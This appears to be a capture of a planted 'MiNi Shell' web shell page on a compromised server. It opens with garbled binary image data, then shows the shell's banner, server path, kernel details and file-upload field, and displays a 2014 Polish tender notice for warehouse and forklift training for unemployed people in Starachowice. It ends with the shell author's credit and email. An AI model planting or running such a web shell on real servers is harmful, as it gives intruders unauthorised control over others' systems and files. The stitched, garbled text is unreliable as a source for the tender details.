JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140630/139703-N-2014.html

<p class="kh_header"><b>Starachowice: Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Rynek Pracy - ocean szans i możliwości, współfinansowanego ze środków EFS, realizowanego z POKL - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.3 mającego na celu nabycie przez uczestników szkolenia nowych kwalifikacji i umiejętności w zakresie: Pracownik hurtowni i magazynu z obsługą wózka podnośnikowego, gospodarką magazynową i kasą fiskalną. Znak sprawy ZP/8/2014.</b><br>
<b>Numer ogłoszenia: 139703 - 2014; data zamieszczenia: 30.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Starachowicach , ul. Radomska 76, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 62 00, faks 41 273 62 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Rynek Pracy - ocean szans i możliwości, współfinansowanego ze środków EFS, realizowanego z POKL - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.3 mającego na celu nabycie przez uczestników szkolenia nowych kwalifikacji i umiejętności w zakresie: Pracownik hurtowni i magazynu z obsługą wózka podnośnikowego, gospodarką magazynową i kasą fiskalną. Znak sprawy ZP/8/2014..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa z zakresu szkolenia. Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Rynek Pracy - ocean szans i możliwości, współfinansowanego ze środków Europejskiego Funduszu Społecznego, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych, mającego na celu nabycie przez uczestników szkolenia nowych kwalifikacji i umiejętności w zakresie: Pracownik hurtowni i magazynu z obsługą wózka podnośnikowego, gospodarką magazynową i kasą fiskalną. Znak sprawy ZP/8/2014.  
Kod zgodnie ze słownikiem CPV 80530000-8.  

- Celem szkolenia jest uzyskanie nowych umiejętności i kwalifikacji przez uczestników szkolenia.
- Proponowana liczba godz.: 170 godzin dla każdego z uczestników szkolenia.
- Zamówienie ma być zrealizowane zgodnie z programem szkolenia. Wymaga się, aby zajęcia odbywały 
   się codziennie od poniedziałku do piątku. W przypadkach uzasadnionych dopuszcza się odbywanie 
   szkolenia w soboty. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w niedzielę oraz w dni 
   ustawowo wolne od pracy.
- Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. 
- Plan nauczania powinien obejmować przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu.
- Miejsce realizacji szkolenia:  miasto Starachowice lub miejscowość w promieniu do 60 km od 
  Starachowic, 
- W przypadku gdy, szkolenie będzie realizowane poza miastem Starachowice, koszty dojazdu uczestników          szkolenia pokrywa Wykonawca.
- Wykonawca zapewni odpowiednią kadrę szkoleniową oraz opracuje szczegółowy harmonogram 
   szkolenia 
- Wykonawca zapewni opiekuna sprawującego nadzór nad grupą szkoleniową oraz osobę czuwającą nad 
  prawidłową realizacją szkolenia.
- Wykonawca zapewni serwis kawowy.
- Wykonawca zapewni niezbędny sprzęt dla prawidłowego przeprowadzenia szkolenia.
- Wykonawca zapewni warunki szkolenia zgodne z przepisami bezpieczeństwa i higieny pracy. 
- Wykonawca zobowiązany jest do upowszechniania informacji poprzez oznaczenie sal wykładowych, 
  materiałów dydaktycznych oraz wszelkiej dokumentacji związanej z organizacją szkolenia, że projekt 
  jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
- Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć otrzyma materiały piśmienne (zeszyt, długopis, itp.),   materiały dydaktyczne (podręczniki, skrypty, inne materiały niezbędne do realizacji szkolenia ) oraz 
  szczegółowy harmonogram szkolenia. 
- Wykonawca zapewni ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników szkolenia 
   z wyjątkiem osób posiadających z tytułu uczestnictwa w szkoleniu prawo do stypendium szkoleniowego.
- W przypadku gdy szkolenie kończy się egzaminem, egzamin zorganizuje i opłaci Wykonawca 
   zamówienia. 
- Wykonawca wyda dokument zawierający logo EFS POKL (zaświadczenie, dyplom, certyfikat),  
   potwierdzający ukończenie szkolenia i uzyskanie umiejętności lub kwalifikacji , o ile przepisy odrębne nie stanowią inaczej zawierający: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu  potwierdzającego ukończenie szkolenia i uzyskanie umiejętności lub  kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia o spełnieniu warunków w trybie art. 22 ust 1 ustawy prawo 
   zamówień publicznych na załączniku nr 1 do SIWZ. 
- Na podstawie złożonego oświadczenia Wykonawcy o posiadaniu wpisu do rejestru instytucji 
   szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę   
   instytucji szkoleniowej /przepisy ustawy z dnia 20.04.2004r. o promocji zatrudnienia i instytucjach rynku    pracy art. 20 ust.1/- załącznik nr 2 do SIWZ.
- Zamawiający dokona sprawdzenia w Rejestrze Instytucji Szkoleniowych czy instytucja szkoleniowa  
   posiada w/w wpis oraz czy kontynuuje swoją działalność w bieżącym roku.
   Zamawiający dokona oceny spełnienia w/w warunku zgodnie z formułą: spełnia - nie spełnia na  
   podstawie oświadczeń dołączonych do oferty oraz informacji zawartych w RIS</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca na spełnienie powyższego warunku ma obowiązek złożenia wykazu wykonanych/ 
   wykonywanych usług, w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres 
   prowadzenia działalności jest krótszy - w tym okresie polegających na przeprowadzeniu szkoleń 
   w tematyce przedmiotu zamówienia na załączniku nr 3 do SIWZ oraz załączy do wykazu 
   poświadczenia mające na celu potwierdzenie należytego wykonania/wykonywania w/w usług. 
   Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca udokumentuje, że wykonał/  
   wykonuje z należytą starannością w okresie ostatnich trzech lat przed upływem terminu składania ofert, a 
   jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę polegającą na 
   przeprowadzeniu szkolenia w tematyce przedmiotu zamówienia. W odniesieniu do nadal wykonywanych  
   usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu 
   składania ofert w toczącym się postępowaniu. Ponadto ocena spełnienia tego warunku nastąpi na 
   podstawie oświadczenia o spełnieniu warunków w trybie art. 22 ust 1 ustawy prawo zamówień 
   publicznych - załącznik nr 1 do SIWZ. 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie załączonego do oferty wykazu, dokumentu oraz oświadczenia zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia o spełnieniu warunków w trybie art. 22 ust 1 ustawy prawo 
   zamówień publicznych na załączniku nr 1 do SIWZ. 
- Na podstawie złożonego oświadczenia o dysponowaniu przez Wykonawcę odpowiednim potencjałem 
   technicznym zapewniającym wykonanie przedmiotu zamówienia na załączniku nr 4 do SIWZ. 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie dołączonych do oferty oświadczeń zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia o spełnieniu warunków w trybie art. 22 ust 1 ustawy prawo 
   zamówień publicznych na załączniku nr 1 do SIWZ. 
- Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania przedmiotu 
   zamówienia oraz wykazu osób biorących udział w realizacji przedmiotu zamówienia zawartego 
   w załączniku nr 5 do SIWZ. 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie dołączonych do oferty oświadczeń zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia o spełnieniu warunków w trybie art. 22 ust 1 ustawy prawo 
   zamówień publicznych na załączniku nr 1 do SIWZ. 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie dołączonego do oferty oświadczenia zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Poświadczenie mające na celu potwierdzenie, że Wykonawca wykonał/ wykonuje z należytą starannością w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę polegającą na przeprowadzeniu szkolenia w tematyce przedmiotu zamówienia. W odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert w toczącym się postępowaniu. 
- Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także w ofercie oświadczenie tych podmiotów o nie podleganiu wykluczeniu 
z prowadzonego postępowania na podstawie art. 24 ust.1 ustawy prawo zamówień publicznych według załącznika nr 6 do SIWZ. Zamawiający dokona oceny spełnienia w/w warunku na podstawie dołączonego do oferty oświadczenia zgodnie z formułą: spełnia - nie spełnia. Wykonawcy mogą wspólnie ubiegać się 
o udzielenie zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy wspólnie ubiegających się o udzielenie zamówienia tworzący konsorcjum, muszą łącznie spełnić warunki w zakresie posiadania uprawnień do wykonywania określonych działalności lub czynności, posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oraz potencjału ekonomicznego i finansowego (art. 22 ust. 1 ustawy prawo zamówień publicznych). Oświadczenie na załączniku nr 1 do SIWZ - składa wyłącznie lider w imieniu konsorcjum. Zamawiający dokona oceny spełnienia w/w warunku na podstawie dołączonego do oferty oświadczenia zgodnie z formułą: spełnia - nie spełnia. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie potwierdzenia nie podlegania wykluczeniu 
z prowadzonego postępowania na podstawie art. 24 ust.1 ustawy prawo zamówień publicznych ma obowiązek złożyć oświadczenie na załącznik nr 6 do SIWZ. Zamawiający dokona oceny spełnienia w/w warunku na podstawie dołączonego do oferty oświadczenia zgodnie z formułą: spełnia - nie spełnia. W przypadku Wykonawców wspólnie ubiegających się o zamówienie tworzących konsorcjum - każdy z członków tego konsorcjum ma obowiązek na podstawie art. 26 ust 2d ustawy prawo zamówień publicznych złożyć listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5, albo informację 
o tym, że nie należy do grupy kapitałowej - załącznik nr 7 do SIWZ. Zamawiający dokona oceny spełnienia w/w warunku na podstawie dołączonej do oferty listy lub informacji zgodnie z formułą: spełnia - nie spełnia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kwalifikacje i doświadczenie kadry dydaktycznej mającej prowadzić to szkolenie - 10</li>
<li>3 - Jakości świadczonych usług przez Wykonawcę - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której projekt stanowi 
    załącznik Nr 9 do niniejszej specyfikacji.
2. W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu zamówienia 
    może ulec zmianie o wartość wzrostu lub spadku tego podatku
3. Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej zmiany 
    okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było           przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od  
    powzięcia wiadomości o tych okolicznościach. W tym przypadku wykonawca może żądać wyłącznie  
    wynagrodzenia należnego z tytułu wykonania części umowy.
4. Zamawiający przewiduje:   
    ze strony Wykonawcy możliwość zmiany: opiekuna grupy, kadry dydaktycznej mającej prowadzić to 
    szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, której kwalifikacje  
    były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by zaproponowana osoba  
    posiadała tożsame lub wyższe kwalifikacje z osobą której zamiana dotyczy a jej kwalifikacje muszą  
    zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów. Powyższe zmiany nie będą 
    powodować aneksowania umowy, a jedynie wymagają akceptacji przez Zamawiającego po 
    wcześniejszym pisemnym jego powiadomieniu. Zamawiający dopuszcza zmianę miejsca odbywania  
    szkolenia pod warunkiem, że nowe miejsce szkolenia wskazane przez Wykonawcę będzie usytuowane 
    w tej samej miejscowości, którą wskazał Wykonawca w złożonej ofercie. Zmiana ta wymaga 
    aneksowania umowy. Zamawiający przewiduje zmianę sprzętu technicznego wykorzystywanego 
    podczas przeprowadzania szkolenia określonego w załączniku oraz ofercie jednostki szkolącej pod 
    warunkiem, że wymieniony sprzęt znajdzie zastosowanie podczas przeprowadzania tego szkolenia. 
    Zmiana ta wymaga jedynie akceptacji Zamawiającego.
    ze strony Zamawiającego: zmianę terminu wykonania zamówienia (wcześniejsze wykonanie 
    przedmiotu zamówienia), zmianę terminu przeprowadzenia szkolenia, zmianę liczby uczestników  
    szkolenia przed jego rozpoczęciem. W przypadku zmiany liczby uczestników szkolenia Zamawiający  
    dokona zapłaty za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby osób 
    przeszkolonych i ceny jednostkowej). Przez cenę jednostkową należy rozumieć iloraz ceny brutto 
    oferty i liczby uczestników szkolenia określonej w opisie przedmiotu zamówienia.
    Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy wymienionych 
    w umowie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-starachowice.pl w zakładce zamówienia publiczne..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2014 godzina 13:20, miejsce: Siedziba Zamawiającego: Powiatowy Urząd Pracy w Starachowicach ul. Radomska 76,  pok. 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> - Zamawiający nie przewiduje zamówień uzupełniających.
   - Zamawiający nie przewiduje zawarcia umowy ramowej.
   - Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
   - Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
   - Zamówienie jest finansowane ze środków Unii Europejskiej w ramach projektu: Rynek Pracy - ocean 
      szans i możliwości, współfinansowanego ze środków Europejskiego Funduszu Społecznego, 
     realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI Rynek pracy otwarty dla   
     wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej 
     w regionie, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu   
     aktywności zawodowej osób bezrobotnych.
- Otwarcie ofert nastąpi w dniu 08 lipca 2014 r. o godz. 13:30 w siedzibie Zamawiającego w pokoju  nr 208. Otwarcie ofert jest jawne..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com